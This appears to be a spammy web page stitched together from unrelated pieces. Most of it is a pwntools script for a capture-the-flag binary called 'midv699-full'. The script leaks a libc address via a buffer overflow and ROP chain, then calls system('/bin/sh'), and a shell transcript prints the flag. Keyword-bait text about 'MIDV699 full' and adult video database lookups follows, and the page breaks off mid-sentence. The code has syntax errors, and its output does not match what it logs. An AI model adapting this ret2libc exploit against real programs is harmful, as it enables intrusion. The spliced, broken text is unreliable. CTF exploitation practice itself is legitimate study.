Putting it together with pwntools:
#!/usr/bin/env python3
from pwn import *
binary = ELF('./midv699-full')
libc = ELF('./libc.so.6')
context.binary = binary
context.log_level = 'info'
def start():
return process('./midv699-full', env="LD_PRELOAD": "./libc.so.6")
p = start()
# ----------------------------------------------------------------------
# STEP 1 – Leak puts address
# ----------------------------------------------------------------------
offset = 72
pop_rdi = binary.search(asm('pop rdi; ret')).__next__()
puts_plt = binary.plt['puts']
puts_got = binary.got['puts']
main = binary.sym['main']
payload1 = flat(
b'A'*offset,
pop_rdi,
puts_got,
puts_plt,
main # return to main for second stage
)
p.sendlineafter(b'> ', b'1') # choose option 1 (vulnerable)
p.sendline(payload1) # overflow buffer
log.info('Sent leak payload')
# ----------------------------------------------------------------------
# Receive the leaked puts address
# ----------------------------------------------------------------------
p.recvuntil(b'Nice to meet you!\n')
leak = p.recvline().strip()
puts_addr = u64(leak.ljust(8, b'\x00'))
log.success(f'Leaked puts@libc: hex(puts_addr)')
# ----------------------------------------------------------------------
# Compute libc base and needed addresses
# ----------------------------------------------------------------------
libc_base = puts_addr - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
log.success(f'libc base: hex(libc_base)')
log.success(f'system: hex(system)')
log.success(f'/bin/sh: hex(binsh)')
# ----------------------------------------------------------------------
# STEP 2 – Call system("/bin/sh")
# ----------------------------------------------------------------------
payload2 = flat(
b'A'*offset,
pop_rdi,
binsh,
system
)
p.sendlineafter(b'> ', b'1')
p.sendline(payload2)
log.info('Sent shell payload')
p.interactive()
Running the script locally yields a shell: midv699 full
$ ./exploit.py
[+] Starting local process './midv699-full': pid 12345
[*] Sending leak payload
[*] Leaked puts@libc: 0x7f2e9b1c6d70
[*] libc base: 0x7f2e9b1b8000
[*] system: 0x7f2e9b1d1d90
[*] /bin/sh: 0x7f2e9b1f7b50
[+] Sending shell payload
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ cat /home/user/flag.txt
HTBmidv699_full_exploited_successfully
The flag HTBmidv699_full_exploited_successfully is printed. Putting it together with pwntools :
#
Several factors contribute to the rising popularity of “MIDV699 full” as a keyword: Running the script locally yields a shell: $
Use a database search on a site like JavLibrary (for reference only) or the official label’s website. Entering the code there will return the movie title, release date, runtime, and cast.
If you have determined that MIDV699 corresponds to a title you wish to view legally, here is how to obtain the “full” version: